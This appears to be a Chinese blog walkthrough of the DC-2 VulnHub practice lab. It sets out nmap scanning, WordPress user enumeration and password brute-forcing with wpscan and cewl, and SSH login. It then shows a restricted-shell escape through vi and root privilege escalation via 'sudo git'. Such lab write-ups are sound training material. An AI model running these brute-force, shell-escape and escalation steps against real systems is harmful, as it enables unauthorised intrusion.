DC-2 靶场渗透

目录

环境搭建

开始渗透

扫存活

扫端口

扫服务

看一下80端口

看一下指纹信息

使用wpscan扫描用户名

再使用cewl生成字典

使用wpscan爆破密码

登陆

使用7744端口

查看shell

rbash绕过

切换到jerry用户

添加环境变量

现在可以使用su命令了

提权

使用git提权


环境搭建

下载地址:

DC: 2 ~ VulnHub

下载压缩包后解压缩,以vmware workstation打开

打开的时候注意将网络类型改为和攻击机一致,以便我们后续操作,我这里使用的是kali攻击机,使用的网络连接类型是NAT所以我这里改为NAT

修改本机的hosts,文件,如果是在kali中该文件位置在/etc/hosts中

开始渗透

扫存活

复制代码
nmap -sn 192.168.11.0/24

靶机IP是192.168.11.130

扫端口

复制代码
nmap -p- 192.168.11.130 

扫服务

复制代码
nmap -sV -A 192.168.11.130

看一下80端口

如下

看一下指纹信息

如下图显示,进入登陆页面(这个登陆页面是使用dirseah扫出来的)

使用wpscan扫描用户名

百度搜索会有wordpress用户名枚举的漏洞,有专门的工具利用这个漏洞,这个工具就是wpscan

使用wpscan --url http://dc-2/ -e u ,扫描出admin、jerry、tom三个用户

再使用cewl生成字典

cewl是根据爬取网站的信息生成字典的工具

cewl http://dc-2/ > ps.txt

使用wpscan爆破密码

wpscan --url http://dc-2/ -U username.txt -P ps.txt

登陆

登陆后进行尝试没有什么可以利用的功能点

使用7744端口

看一下这个端口不认识,百度也没有消息

使用7744这个端口尝试ssh登陆,使用jerry没有成功,使用tom成功。(这里我们可以总结一下,知道对方的用户名和密码,并且有不认识的端口,我们可以尝试一下ssh)

查看shell

这个shell是带有限制的shell

rbash绕过

这里尝试了shell、echo获取完整shell都失败了

最后,使用vi可以执行命令的特性,在命令模式中输入如下命令:

复制代码
set shell=/bin/sh

shell

成功获取完整shell

切换到jerry用户

su命令无法使用

添加环境变量

tom@DC-2:~ export PATH=PATH:/bin/

现在可以使用su命令了

成功切换,但是还是不是root权限

提权

这里使用sudo git时不需要输入密码

使用git提权

进入git help config后输入

!/bin/bash

成功提权

相关推荐
T***160741 分钟前
免费的Web安全漏洞利用,Metasploit教程
安全·web安全
武汉唯众智创44 分钟前
职业院校网络安全靶场实训演练系统建设方案
网络·安全·web安全·网络安全·网络安全靶场实训演练系统·网络安全靶场实训·网络安全实训演练系统
盈创力和20071 小时前
北斗形变监测仪:高精度结构安全的“守护之眼”
安全·变形监测·地质灾害监测·北斗形变监测仪·楼宇变形监测·桥梁隧道公路变形监测·水利安全监测
奋进的电子工程师1 小时前
如何实现开源组件的安全与合规治理?
安全·开源·代码规范·设计规范·代码复审
没文化的程序猿1 小时前
如何降低淘宝商品详情API安全强化与生态协同创新的成本?
安全
IT闫3 小时前
Rust的内存安全与实战落地的直观解析
开发语言·安全·rust
金士镧(厦门)新材料有限公司3 小时前
稀土抑烟剂:为电子电气设备外壳提供“安全屏障”
科技·安全·全文检索
晓翔仔3 小时前
网络安全之Web入侵场景
前端·安全·web安全·网络安全·信息安全
Andya_net4 小时前
网络安全 | 深入解析XSS攻击与防御实战
安全·web安全·xss
Guheyunyi4 小时前
安防监控系统,如何为你的生活构筑智慧安全屏障?
大数据·人工智能·安全·信息可视化·生活